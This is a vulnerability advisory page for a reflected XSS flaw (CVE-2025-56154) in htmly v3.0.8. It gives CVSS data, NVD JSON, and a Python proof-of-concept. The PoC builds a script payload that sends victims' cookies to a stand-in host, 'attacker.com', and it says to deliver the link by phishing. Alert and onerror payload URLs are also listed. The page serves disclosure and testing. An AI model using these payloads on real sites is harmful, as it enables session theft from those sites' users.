Security Vulnerability Report
CVE-2025-56154 CVSS 6.1 MEDIUM

CVE-2025-56154

Published: 2025-10-02 16:15:35
Last Modified: 2026-01-20 18:16:05

Description

htmly v3.0.8 is vulnerable to Cross Site Scripting (XSS) in the /author/:name endpoint of the affected application. The name parameter is not properly sanitized before being reflected in the HTML response, allowing attackers to inject arbitrary JavaScript payloads.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:htmly:htmly:3.0.8:*:*:*:*:*:*:* - VULNERABLE
htmly <= v3.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
## CVE-2025-56154 - htmly Reflected XSS PoC
## Affected: htmly <= v3.0.8
## Endpoint: /author/:name
## Author: akinerkisa

# Basic PoC - Cookie stealing via reflected XSS
# The payload is injected into the /author/:name endpoint

import requests

TARGET_URL = "http://target-htmly-site.com"
ATTACKER_SERVER = "http://attacker.com/steal"

# Malicious JavaScript payload to steal cookies
payload = f'<script>document.location="{ATTACKER_SERVER}?c="+document.cookie</script>'

# Construct the exploit URL
exploit_url = f"{TARGET_URL}/author/{payload}"

print(f"[+] Exploit URL: {exploit_url}")
print("[+] Send this URL to the victim via phishing email/messaging")

# Verify the vulnerability
response = requests.get(exploit_url)
if payload in response.text:
    print("[+] Vulnerability confirmed! Payload reflected without sanitization.")
else:
    print("[-] Payload not found in response. Target may be patched.")

## Alternative simple PoC URL:
## http://target-htmly-site.com/author/<script>alert('XSS')</script>
## http://target-htmly-site.com/author/<img src=x onerror=alert(document.cookie)>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56154", "sourceIdentifier": "[email protected]", "published": "2025-10-02T16:15:34.773", "lastModified": "2026-01-20T18:16:04.927", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "htmly v3.0.8 is vulnerable to Cross Site Scripting (XSS) in the /author/:name endpoint of the affected application. The name parameter is not properly sanitized before being reflected in the HTML response, allowing attackers to inject arbitrary JavaScript payloads."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:htmly:htmly:3.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "1DC9B20D-4A16-40EA-8522-B7049331B704"}]}]}], "references": [{"url": "https://gist.github.com/akinerkisa/28e97fa132b1a98cff5d05a79b437901", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/danpros/htmly/releases/tag/v3.0.9#:~:text=Security%20fixes%20found%20in%20version%203.0.8", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://pastebin.com/dVityKmU", "source": "[email protected]"}]}}